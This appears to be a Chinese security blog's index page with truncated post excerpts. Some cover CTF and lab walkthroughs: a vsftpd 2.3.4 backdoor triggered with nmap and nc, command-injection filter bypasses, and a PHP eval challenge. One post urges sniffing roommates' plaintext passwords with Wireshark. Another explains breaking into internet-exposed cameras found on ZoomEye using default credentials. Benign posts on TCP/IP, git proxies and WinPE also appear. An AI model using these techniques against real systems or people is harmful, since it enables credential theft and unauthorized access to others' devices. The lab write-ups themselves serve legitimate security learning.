FakerCsr's Magic Box

Easy File Sharing Web Server 漏洞的简单利用背景 EFS Easy File Sharing (EFS) Web Server是荷兰EFS Software公司的一套集论坛网站，文件上传、下载、共享和图片共享等功能的文件共享软件。 EFS EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者可通过向forum.ghp文件发送恶意的登录请求利用该漏洞执行任意代码。 Easy File Sharing Web Server在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞获取敏感信息。Easy File Sharing Web Server在上传文件时没有正确地过滤某些参数，允许用户通过目录遍历攻击向任意父目录上传文件。 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验，存在缓冲区溢出漏洞，导致当用户输入太长的用户名导致缓冲区溢出，覆盖程序原本的返回地址，导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进而导致服务器被黑客控制。 复现环境k ...

背景漏洞服务：VSFTPD 2.3.4，俗称笑脸漏洞。存在于这个2.3.4版本，属于开发者设计上的失误。在检测到用户名带有特殊字符：）时，会自动打开6200端口。 攻击机：kali linux 靶机：Metasploitable2 0.网络配置，将kali与Metasploitable2放在同一主机下，以nat模式连接。 1.查看自己的ip1ifconfig 192.168.222.130 2.扫描自己ip下的端口1nmap 192.168.222.0/24 发现192.168.222.133存在21端口 3.扫描该ip开启的服务1nmap -sV 192.168.222.133 发现ftp服务版本为vsftpd2.3.4 4.查看6200端口是否开放1nmap -p 6200 192.168.222.133 发现6200端口关闭 5.NetCat连接21端口1nc 192.168.222.133 21 用户名输入笑脸符号:) 密码随意 12uesr a:)pass 11 6.再次查看6200端口的开放情况1nmap -p 6200 192.16 ...

CTF命令执行与绕过一、linux 常用符号1.管道符 多命令执行符 格式 作用 ; 命令1;命令2 多个命令顺序执行，命令之间无任何逻辑关系 && 命令1&&命令2 逻辑与：当命令1正确执行后，命令2才会正确执行，否则命令2不会执行 || 命令1 逻辑或：当命令1不正确执行后，命令2才会正确执行，否则命令2不会执行 2.通配符 3.Bash中其他特殊符号 4.其他一些常用符号 符号 作用 %0a 换行符 %0d 回车符 | 将前一个命令的输出作为后一个命令的输入 && 前一个命令执行成功才会执行下一条命令 || 前一个命令执行失败才会执行下一条命令 & 表示将前一个命令设置进入后台 二、绕过1.空格绕过 ${IFS} {IFS}$9 $IFS$9 重定向符：<>（但是不支持后面跟通配符） 水平制表符%09 2.黑名单绕过 1.变量拼接：a=c;b=at;c=flag;$a$b $c 2.利用已存在的资源：从已有的文 ...

Wireshark如何抓明文用户名和密码1.抓包如果你的网站的协议是http的，那么你的数据在网线中传输就是明文的，不加密的。只要黑客能抓到这一段数据，就轻松获得你的账号和密码。本文介绍如何抓自己wifi下的登录的用户名和密码。 打开wireshark开启捕获 进入登录界面 随后输入账号密码进行登录 在wireshark过滤器中输入： http.request.method==POST 即可获得之前登录的post包 在下面的HTML Form URL Encoded: application/x-www-form-urlencoded 即可获得刚刚登录的账号密码 2.总结至此，我们成功在自己的网络上抓到自己的登录账号和密码，当然，打开也可以试试抓抓室友同学的账号和密码哦，因为你们是同一个wifi下，能轻松抓到数据包，只要你知道他登录的网站的ip，在同一时间段基本可以抓到数据包，账号和密码也就一览无余啦。 同时提醒大家，外面的开放的wifi不要随便连哦。

利用ZoomEye远程登录控制摄像头很多摄像头厂商存在口令机制的漏洞，比如设置了默认账号和口令，而用户使用时候并没有更改。 某厂商默认账号密码为 admin 12345 进入钟馗之眼网址搜索DVRDVS-Webs（DVRDVS-Webs是某厂商摄像头管理系统的http-banner） 访问该ip地址即可进入登录界面 然后利用默认账号密码进入摄像头界面 如果登录进去提示需要下载插件，那就将插件下载下来 如果插件下载之后仍然提示你需要下载插件 经过查询后发现问题在于浏览器 安装插件后需要使用ie内核的浏览器打开才能加载此插件进行显示 WebComponents.exe IE11 32位版本完美支持 ，并且WebComponents.exe没有64位版本 所以确定你浏览器内核是IE9以上 最好是IE11，亲测IE9不支持 最简单的方法就是下载一个IE11 32位版本的来运行，如果你非要用其他浏览器 像火狐，谷歌这种点进去看看是不是插件被屏蔽了 基本报这种错误就是上面2个原因 解决方法就是使用ie内核如ie浏览器 那你需要打开ie浏览器，进入设置 添加该浏览器的网址，然后进入摄 ...

关于tcp/ip协议的一点理解一、协议在计算机网络与信息通讯领域里，人们经常提及 “协议” 一词。互联网中常用的协议有HTTP、TCP、IP等。 协议的必要性简单来说，协议就是计算机与计算机之间通过网络通信时，事先达成的一种 “约定”。这种“约定”使不同厂商的设备、不同的CPU以及不同操作系统组成的计算机之间，只要遵循相同的协议就能够实现通信。这就好比一个中国人说汉语一个外国人说英语使用不同的国家语言进行沟通，怎么也无法理解。如果两个人约定好 都说中文或英文，就可以互相沟通通信。协议分为很多种，每一种协议都明确界定了它的行为规范。两台计算机必须能够支持相同的协议，并遵循相同协议进行处理，这样才能实现相互通信。 二、协议分层TCP/IP协议TCP/IP 是用于因特网 (Internet) 的通信协议。 TCP/IP 通信协议是对计算机必须遵守的规则的描述，只有遵守这些规则，计算机之间才能进行通信。 TCP (Transmission Control Protocol)和UDP(User Datagram Protocol)协议属于传输层协议。其中TCP提供IP环境下的数据可靠传 ...

git clone出现 fatal: unable to access ‘https://github.com/...'的解决办法(亲测有效)在开启shadowsocks的前提下，手动配置git的代理。git客户端输入如下两个命令就可以了。 12git config --global http.proxy http://127.0.0.1:1080git config --global https.proxy http://127.0.0.1:1080 然后取消代理 12git config --global --unset http.proxy git config --global --unset https.proxy 通常情况用这种方法解决即可 参考链接

typora+gitee+picgo建立云图床笔记本文转载自小麦,感觉写的特别好，拿来分享 引子：在日常书写笔记的时候，个人比较喜好使用typora在本地编辑，因为其比较简洁方便速度快，但使用typora在本地编辑也有一个坏处，譬如说，当你从其他地方复制粘贴一张图片作为到typora上作为自己笔记的一部分的时候，该图片的地址为你本地粘贴板的地址，而当你想要将该笔记上传到云端的时候，就会出现因为图片不在图床上导致的上传图片无法正常被转存，而要多一步重新截图复制粘贴的步骤，当你笔记图片较多的时候（譬如说我），就会觉得特别麻烦，所以就有了以下教程，傻瓜级别，带你避坑 当使用该方法建立云笔记之后，可以在typora上直接复制粘贴图片，也可以直接将本地图片复制粘贴过来，而在typora上会自动上传图片到gitee的图床上，而现在的图片就可以正常在外界博客上或者别人被读取了，且因为gitee在国内，速度相较于github的图床速度更快，且gitee也不限制图片上传的总大小，可以说是非常的方便了。 实际操作Gitee1.首先现在gitee上创建一个账号，创建账号的操作就不要我教了叭，之后点击新建仓 ...

winPE启动盘的制作一：什么是PE根据维基百科的解释，PE，Windows预先安装环境（Microsoft Windows Preinstallation Environment），简称Windows PE或WinPE，是Microsoft Windows的轻量版本，主要提供个人计算机开发商（主要为OEM厂商）、工作站、服务器打造定制的操作系统环境，或系统离线时进行故障排除来使用。 二：PE可以用来做什么PE不仅仅可以用来重装系统，他还可以做以下事情：清除登录密码；磁盘分区；系统崩溃时拷贝桌面重要资料；修复引导；重建分区表等等。 三：制作PE启动盘网上PE众多，但是大部分都有捆绑。目前我自己在使用的PE是微PE和edgeless，后者插件众多，功能更丰富。 制作前准备： 一台可以正常使用，最好是可以上网的电脑 一个空U盘，最好是8G或者8G以上 首先进入微PE官网（http://www.wepe.com.cn）下载微PE，目前微PE需付费1.99元获取下载链接，也可以直接点击跳过。或者从我分享的链接里下载：[网盘链接][1]提取码: 1234 打开我们刚才下载好的软件，软件默认名字是 ...

web29源码为： <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看到过滤了flag字样 但我们可以通过通配符绕过flag，比如用fla?来表示flag 先用?c=sy ...